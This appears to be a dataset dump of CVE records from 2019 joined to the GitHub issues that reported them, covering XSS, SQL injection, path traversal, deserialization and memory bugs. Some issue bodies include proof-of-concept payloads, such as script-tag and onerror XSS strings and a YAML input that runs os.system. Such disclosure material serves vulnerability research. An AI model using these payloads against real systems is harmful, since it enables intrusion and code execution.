cve_id stringlengths 13 16 | cve_published stringdate 2019-01-01 16:29:00 2025-02-25 20:15:37 | cve_descriptions stringlengths 34 2.6k | cve_metrics dict | cve_references listlengths 1 281 | cve_configurations listlengths 1 70 | cve_cwe_list listlengths 1 1 | cve_primary_cwe stringclasses 164
values | url stringlengths 36 97 | cve_tags listlengths 1 5 ⌀ | domain stringclasses 1
value | issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 198k ⌀ | issue_title stringlengths 1 335 | issue_comments_url stringlengths 55 116 | issue_comments_count int64 0 338 | issue_created_at stringdate 2012-06-06 09:34:24 2025-04-02 09:37:20 | issue_updated_at stringdate 2014-04-01 20:16:21 2025-06-16 12:26:58 | issue_html_url stringlengths 36 97 | issue_github_id int64 4.93M 2.97B | issue_number int64 1 199k | __index_level_0__ int64 0 6.55k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
CVE-2018-20652 | 2019-01-01T16:29:00.403 | An attempted excessive memory allocation was discovered in the function tinyexr::AllocateImage in tinyexr.h in tinyexr v0.9.5. Remote attackers could leverage this vulnerability to cause a denial-of-service via crafted input, which leads to an out-of-memory exception. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/syoyo/tinyexr/issues/104"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.co... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tinyexr_project:tinyexr:0.9.5:*:*:*:*:*:*:*",
"matchCriteriaId": "6839BA33-4B4D-413F-8E81-0C4F9784EBBB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | [
"770"
] | 770 | https://github.com/syoyo/tinyexr/issues/104 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"syoyo",
"tinyexr"
] | Hi, there.
I test the program at the master branch.
```
commit b3eb24bf635c0ed92f1080a1b269bc8271cbb919
Author: Syoyo Fujita <syoyo@lighttransport.com>
Date: Mon Dec 24 20:33:23 2018 +0900
Add IsEXR() API.
```
An Out of Memory problem was discovered in function tinyexr::AllocateImage in tinyexr.h. T... | Program crash due to Out-of-memory in function tinyexr::AllocateImage | https://api.github.com/repos/syoyo/tinyexr/issues/104/comments | 3 | 2018-12-31T13:56:35Z | 2018-12-31T15:25:33Z | https://github.com/syoyo/tinyexr/issues/104 | 394,984,060 | 104 | 0 |
CVE-2019-3500 | 2019-01-02T07:29:00.197 | aria2c in aria2 1.33.1, when --log is used, can store an HTTP Basic Authentication username and password in a file, which might allow local users to obtain sensitive information by reading this file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/aria2/aria2/issues/1329"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-an... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:aria2_project:aria2:1.33.1:*:*:*:*:*:*:*",
"matchCriteriaId": "96C8BA0F-F5C0-4768-A381-B61A776211B2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartE... | [
"532"
] | 532 | https://github.com/aria2/aria2/issues/1329 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"aria2",
"aria2"
] | Hi Team,
I am using aria2 version 1.33.1 on 4.15.0-43-generic 46-Ubuntu.
1. It was observed that URL's which gets downloaded via `--log=` attribute stored sensitive information.
2. In combination with HTTP authentication a username and password can be part of the URL.
`aria2c --log=file https://user:passwd@ex... | Metadata and potential password leaks via --log= | https://api.github.com/repos/aria2/aria2/issues/1329/comments | 4 | 2019-01-01T12:52:33Z | 2019-01-05T00:33:48Z | https://github.com/aria2/aria2/issues/1329 | 395,080,684 | 1,329 | 1 |
CVE-2019-3501 | 2019-01-02T13:29:00.283 | The OUGC Awards plugin before 1.8.19 for MyBB allows XSS via a crafted award reason that is mishandled on the awards page or in a user profile. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Sama34/OUGC-Awards/issues/29"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/Sama34/OUG... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ougc_awards_project:ougc_awards:*:*:*:*:*:mybb:*:*",
"matchCriteriaId": "5B7E7E8E-4508-44F9-861D-A5D9FEE232E7",
"versionEndExcluding": "1.8.19",
"versionEndIncluding": null,
... | [
"79"
] | 79 | https://github.com/Sama34/OUGC-Awards/issues/29 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Sama34",
"OUGC-Awards"
] | **Describe the bug**
Apparently custom reasons are not sanitized on output.
**To Reproduce**
Steps to reproduce the behavior:
1. Have a mod account level or higher.
2. Go to Manage Awards in ModCP.
3. Give an award to a user and input payload for reason.
```JS
<script>alert('XSS')</script>
```
4. Payload ex... | XSS in reason field. | https://api.github.com/repos/OUGC-Network/ougc-Awards/issues/29/comments | 1 | 2019-01-02T05:47:24Z | 2019-01-02T06:23:28Z | https://github.com/OUGC-Network/ougc-Awards/issues/29 | 395,154,317 | 29 | 2 |
CVE-2019-3573 | 2019-01-02T15:29:00.360 | In libsixel v1.8.2, there is an infinite loop in the function sixel_decode_raw_impl() in the file fromsixel.c, as demonstrated by sixel2png. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/TeamSeri0us/pocs/tree/master/libsixel"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/saitoha/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libsixel_project:libsixel:1.8.2:*:*:*:*:*:*:*",
"matchCriteriaId": "BAFCC979-2F4E-46A5-AC18-B6452E752D90",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionS... | [
"835"
] | 835 | https://github.com/saitoha/libsixel/issues/83 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"saitoha",
"libsixel"
] | ./sixel2png [infinite_loop_poc1](https://github.com/TeamSeri0us/pocs/blob/master/libsixel/infinite_loop_poc1)
```
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ source:../../src/fromsixel.c+561 ]──... | two bugs in img2sixel and sixel2png | https://api.github.com/repos/saitoha/libsixel/issues/83/comments | 7 | 2019-01-02T08:08:21Z | 2019-12-14T21:01:47Z | https://github.com/saitoha/libsixel/issues/83 | 395,173,691 | 83 | 4 |
CVE-2018-20659 | 2019-01-02T17:29:00.220 | An issue was discovered in Bento4 1.5.1-627. The AP4_StcoAtom class in Core/Ap4StcoAtom.cpp has an attempted excessive memory allocation when called from AP4_AtomFactory::CreateAtomFromStream in Core/Ap4AtomFactory.cpp, as demonstrated by mp42hls. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/350"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https:... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-627:*:*:*:*:*:*:*",
"matchCriteriaId": "F87642DF-B939-4195-A2AE-F0F1D39CD16D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | [
"770"
] | 770 | https://github.com/axiomatic-systems/Bento4/issues/350 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] | A crafted input will lead to Memory allocation failed in Ap4StcoAtom.cpp at Bento4 1.5.1-627
Triggered by
./mp42hls crash7.mp4
Poc
[crash7.mp4.zip](https://github.com/axiomatic-systems/Bento4/files/2718552/crash7.mp4.zip)
Bento4 Version 1.5.1-627
The ASAN information is as follows:
```
==10432==ERROR: Add... | Allocate for large amounts of memory failed in Ap4StcoAtom.cpp:81 at Bento4 1.5.1-627 when running mp42hls | https://api.github.com/repos/axiomatic-systems/Bento4/issues/350/comments | 2 | 2018-12-31T15:52:26Z | 2019-01-12T21:14:48Z | https://github.com/axiomatic-systems/Bento4/issues/350 | 394,998,583 | 350 | 5 |
CVE-2019-3577 | 2019-01-02T17:29:00.300 | An issue was discovered in Waimai Super Cms 20150505. web/Lib/Action/ProductAction.class.php allows blind SQL Injection via the id[0] parameter to the /product URI. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/caokang/waimai/issues/9"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/caokang/waimai/issues/9"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bijiadao:waimai_super_cms:20150505:*:*:*:*:*:*:*",
"matchCriteriaId": "8945479A-0C5E-4FC7-9D88-BC42E8EA0C3C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versi... | [
"89"
] | 89 | https://github.com/caokang/waimai/issues/9 | [
"Third Party Advisory"
] | github.com | [
"caokang",
"waimai"
] | There is a blind sql injection.
waimaiCMS is based on thinkphp3.1.3, vulnerable code in web/Lib/Action/ProductAction.class.php
```php
public function index(){
$data['fid']=I('id');//店铺分类
$Food=M('Food');
$fooditem=$Food->where($data)->find();
$this->assign('fooditem',$fooditem);
$thi... | There is a SQL Injection vulnerability | https://api.github.com/repos/caokang/waimai/issues/9/comments | 1 | 2019-01-02T16:02:56Z | 2019-01-03T03:00:52Z | https://github.com/caokang/waimai/issues/9 | 395,294,746 | 9 | 6 |
CVE-2018-14718 | 2019-01-02T18:29:00.310 | FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the slf4j-ext class from polymorphic deserialization. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/106601"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHBA-2019:0959"
},
{
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7036DA13-110D-40B3-8494-E361BBF4AFCD",
"versionEndExcluding": "2.6.7.3",
"versionEndIncluding": null,
"versio... | [
"502"
] | 502 | https://github.com/FasterXML/jackson-databind/issues/2097 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"FasterXML",
"jackson-databind"
] | This issue covers following CVEs related to polymorphic deserialization, gadgets:
* CVE-2018-14718: RCE with slf4j-ext jar
* CVE-2018-14719: RCE with blaze-ds-opt, -core jars
* CVE-2018-14720: exfiltration/XXE with only JDK classes (some JDK versions)
* CVE-2018-14721: exfiltration/SSRF with axis2-jaxws
Origin... | Block more classes from polymorphic deserialization (CVE-2018-14718 - CVE-2018-14721) | https://api.github.com/repos/FasterXML/jackson-databind/issues/2097/comments | 11 | 2018-07-27T05:58:22Z | 2019-10-16T04:34:07Z | https://github.com/FasterXML/jackson-databind/issues/2097 | 345,100,313 | 2,097 | 7 |
CVE-2018-19360 | 2019-01-02T18:29:00.717 | FasterXML jackson-databind 2.x before 2.9.8 might allow attackers to have unspecified impact by leveraging failure to block the axis2-transport-jms class from polymorphic deserialization. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/107985"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHBA-2019:0959"
},
{
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5128ECDA-6F9A-42AC-9063-CDFC4C256537",
"versionEndExcluding": null,
"versionEndIncluding": "2.6.7.2",
"versio... | [
"502"
] | 502 | https://github.com/FasterXML/jackson-databind/issues/2186 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"FasterXML",
"jackson-databind"
] | This issue covers following CVEs related to polymorphic deserialization, gadgets:
CVE-2018-19360 (axis2-transport-jms)
CVE-2018-19361 (openjpa)
CVE-2018-19362 (jboss-common-core)
See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the gen... | Block more classes from polymorphic deserialization (CVE-2018-19360, CVE-2018-19361, CVE-2018-19362) | https://api.github.com/repos/FasterXML/jackson-databind/issues/2186/comments | 8 | 2018-11-18T23:39:02Z | 2020-07-31T17:29:54Z | https://github.com/FasterXML/jackson-databind/issues/2186 | 382,014,049 | 2,186 | 8 |
CVE-2019-3580 | 2019-01-03T01:29:00.490 | OpenRefine through 3.1 allows arbitrary file write because Directory Traversal can occur during the import of a crafted project file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/OpenRefine/OpenRefine/issues/1927"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"T... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openrefine:openrefine:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A371C8E5-A486-40DE-8750-DAFA4D592354",
"versionEndExcluding": null,
"versionEndIncluding": "3.1",
"versionStartExc... | [
"22"
] | 22 | https://github.com/OpenRefine/OpenRefine/issues/1927 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"OpenRefine",
"OpenRefine"
] | **Describe the bug**
The import of a project is prone to a path traversal and thus an arbitrary file write.
**To Reproduce**
Steps to reproduce the behavior:
1. Download [payload.txt](https://github.com/OpenRefine/OpenRefine/files/2721399/payload.txt)
2. `gzip payload.txt`, `payload.txt.gz` is greated
3. Go to ... | Project import vulnerable to arbitrary file write | https://api.github.com/repos/OpenRefine/OpenRefine/issues/1927/comments | 3 | 2019-01-02T17:44:47Z | 2019-02-22T19:13:17Z | https://github.com/OpenRefine/OpenRefine/issues/1927 | 395,324,645 | 1,927 | 9 |
CVE-2018-20663 | 2019-01-03T19:29:01.633 | The Reporting Addon (aka Reports Addon) through 2019-01-02 for CUBA Platform through 6.10.x has Persistent XSS via the "Reports > Reports" name field. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/cuba-platform/reports/issues/140"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://g... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:haulmont:cuba_platform:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7F6B5878-0971-4E5A-A121-439A3E3F0DEA",
"versionEndExcluding": null,
"versionEndIncluding": "6.10.7",
"versionStar... | [
"79"
] | 79 | https://github.com/cuba-platform/reports/issues/140 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"cuba-platform",
"reports"
] | <!--
Please use https://www.cuba-platform.com/discuss for discussion, support, and reporting problems about CUBA Studio.
This repository is only for issues of the Reporting addon.
When creating an issue, provide as much as possible of the following information:
-->
### Environment
- Platform version: 6.9.... | Permanent XSS attack through Report's Name field | https://api.github.com/repos/cuba-platform/reports/issues/140/comments | 5 | 2018-12-21T13:58:43Z | 2019-03-04T13:25:39Z | https://github.com/cuba-platform/reports/issues/140 | 393,468,080 | 140 | 10 |
CVE-2019-3575 | 2019-01-03T19:29:01.727 | Sqla_yaml_fixtures 0.9.1 allows local users to execute arbitrary python code via the fixture_text argument in sqla_yaml_fixtures.load. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/schettino72/sqla_yaml_fixtures/issues/20"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sqla_yaml_fixtures_project:sqla_yaml_fixtures:0.9.1:*:*:*:*:*:*:*",
"matchCriteriaId": "7ED3C927-3CA7-415E-9574-6D108DC91EA7",
"versionEndExcluding": null,
"versionEndIncluding": null,
... | [
"94"
] | 94 | https://github.com/schettino72/sqla_yaml_fixtures/issues/20 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"schettino72",
"sqla_yaml_fixtures"
] | import sqla_yaml_fixtures
test_str ='!!python/object/apply:os.system ["dir"]'
sqla_yaml_fixtures.load('a','a',test_str)
Hi, there is a vulnerability in load methods in sqla_yaml_fixtures,please see PoC above. It can execute arbitrary python commands resulting in command execution. | sqla_yaml_fixtures.load method is vulnerable | https://api.github.com/repos/schettino72/sqla_yaml_fixtures/issues/20/comments | 2 | 2019-01-02T15:02:16Z | 2019-01-04T20:53:01Z | https://github.com/schettino72/sqla_yaml_fixtures/issues/20 | 395,274,955 | 20 | 11 |
CVE-2018-19600 | 2019-01-03T20:29:00.437 | Rhymix CMS 1.9.8.1 allows XSS via an index.php?module=admin&act=dispModuleAdminFileBox SVG upload. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/rhymix/rhymix/issues/1088"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:rhymix:rhymix:1.9.8.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D2833B50-FE4E-40C7-AB0B-3572D5C8A103",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | [
"79"
] | 79 | https://github.com/rhymix/rhymix/issues/1088 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"rhymix",
"rhymix"
] | Affected software: Rhymix CMS 1.9.8.1
Type of vulnerability: XSS via SVG file upload.
Description: Rhymix CMS is prone to a Persistent Cross-Site Scripting attack that allows a malicious user to inject HTML or scripts that can access any cookies, session tokens, or other sensitive information retained by your bro... | XSS via SVG file upload in Rhymix CMS 1.9.8.1 | https://api.github.com/repos/rhymix/rhymix/issues/1088/comments | 7 | 2018-09-16T08:51:31Z | 2019-01-11T07:12:45Z | https://github.com/rhymix/rhymix/issues/1088 | 360,618,894 | 1,088 | 12 |
CVE-2018-19601 | 2019-01-03T20:29:00.500 | Rhymix CMS 1.9.8.1 allows SSRF via an index.php?module=admin&act=dispModuleAdminFileBox SVG upload. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/rhymix/rhymix/issues/1089"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:rhymix:rhymix:1.9.8.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D2833B50-FE4E-40C7-AB0B-3572D5C8A103",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | [
"918"
] | 918 | https://github.com/rhymix/rhymix/issues/1089 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"rhymix",
"rhymix"
] | Affected software: Rhymix CMS 1.9.8.1
Type of vulnerability: SSRF via SVG file upload.
Description:
Discovered by: BreachLock
Website: https://www.breachlock.com
Author: Subodh Kumar
Description: SSRF as in Server Side Request Forgery is a vulnerability that allows an attacker to force server interfa... | SSRF via SVG file upload in Rhymix CMS 1.9.8.1 | https://api.github.com/repos/rhymix/rhymix/issues/1089/comments | 3 | 2018-09-16T08:56:44Z | 2019-01-11T07:13:30Z | https://github.com/rhymix/rhymix/issues/1089 | 360,619,275 | 1,089 | 13 |
CVE-2019-5310 | 2019-01-04T14:29:00.457 | YUNUCMS 1.1.8 has XSS in app/admin/controller/System.php because crafted data can be written to the sys.php file, as demonstrated by site_title in an admin/system/basic POST request. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/doublefast/yunucms/issues/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yunucms:yunucms:1.1.8:*:*:*:*:*:*:*",
"matchCriteriaId": "3219173C-4A6B-496B-A8BA-D0879257DF03",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | [
"79"
] | 79 | https://github.com/doublefast/yunucms/issues/6 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"doublefast",
"yunucms"
] | There is an Stored Cross Site Scripting vulnerability in your latest version of the CMS v1.1.8
Download link: "http://img.yunucms.com/o_1cvnmdq4igqv3i713iq183fu7qa.zip?attname="
In the /YUNUCMSv1.1.8/app/admin/controller/System.php
The judgment code of the basic settings page is:
 function:
.
Unfortunately, the vulnerability is still present in version `3.3.0`, see the image below.
 to escape value. But some variables do not use the function db_escape().
**environment** : docker mattrayner/lamp:latest-1604
### 0x00 Description
includes/db/class.reflines_db.inc:156
If I set parameter ... | SQL Injection | https://api.github.com/repos/FrontAccountingERP/FA/issues/38/comments | 2 | 2019-01-07T11:10:06Z | 2020-07-13T11:48:08Z | https://github.com/FrontAccountingERP/FA/issues/38 | 396,445,072 | 38 | 17 |
CVE-2016-10735 | 2019-01-09T05:29:00.883 | In Bootstrap 3.x before 3.4.0 and 4.x-beta before 4.0.0-beta.2, XSS is possible in the data-target attribute, a different vulnerability than CVE-2018-14041. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://access.redhat.com/errata/RHBA-2019:1076"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://access.redhat.com/errata/RHBA-2019:1570"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://access.... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:getbootstrap:bootstrap:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8497B424-E8CC-4FEF-844B-FE33F2C18E6E",
"versionEndExcluding": "3.4.0",
"versionEndIncluding": null,
"versionStart... | [
"79"
] | 79 | https://github.com/twbs/bootstrap/issues/20184 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"twbs",
"bootstrap"
] | The data-target attribute is vulnerable to Cross-Site Scripting attacks:
``` html
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>
<button data-toggle="collapse" data-target="<img src=x on... | XSS in data-target attribute | https://api.github.com/repos/twbs/bootstrap/issues/20184/comments | 44 | 2016-06-27T15:33:54Z | 2023-08-16T13:52:10Z | https://github.com/twbs/bootstrap/issues/20184 | 162,481,500 | 20,184 | 18 |
CVE-2016-10735 | 2019-01-09T05:29:00.883 | In Bootstrap 3.x before 3.4.0 and 4.x-beta before 4.0.0-beta.2, XSS is possible in the data-target attribute, a different vulnerability than CVE-2018-14041. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://access.redhat.com/errata/RHBA-2019:1076"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://access.redhat.com/errata/RHBA-2019:1570"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://access.... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:getbootstrap:bootstrap:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8497B424-E8CC-4FEF-844B-FE33F2C18E6E",
"versionEndExcluding": "3.4.0",
"versionEndIncluding": null,
"versionStart... | [
"79"
] | 79 | https://github.com/twbs/bootstrap/issues/27915#issuecomment-452140906 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"twbs",
"bootstrap"
] | Github considers Bootstrap 3.4.0 an insecure dependency via its [security vulnerability alerts tool](https://help.github.com/articles/about-security-alerts-for-vulnerable-dependencies). It points to the [NVD CVE-2018-14041](https://nvd.nist.gov/vuln/detail/CVE-2018-14041) page, which shows that only >4.1.2 is secure. I... | Github considers bootstrap 3.4.0 as insecure | https://api.github.com/repos/twbs/bootstrap/issues/27915/comments | 19 | 2018-12-23T16:23:10Z | 2019-02-04T07:45:21Z | https://github.com/twbs/bootstrap/issues/27915 | 393,762,774 | 27,915 | 19 |
CVE-2018-20676 | 2019-01-09T05:29:01.287 | In Bootstrap before 3.4.0, XSS is possible in the tooltip data-viewport attribute. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://access.redhat.com/errata/RHBA-2019:1076"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://access.redhat.com/errata/RHBA-2019:1570"
},
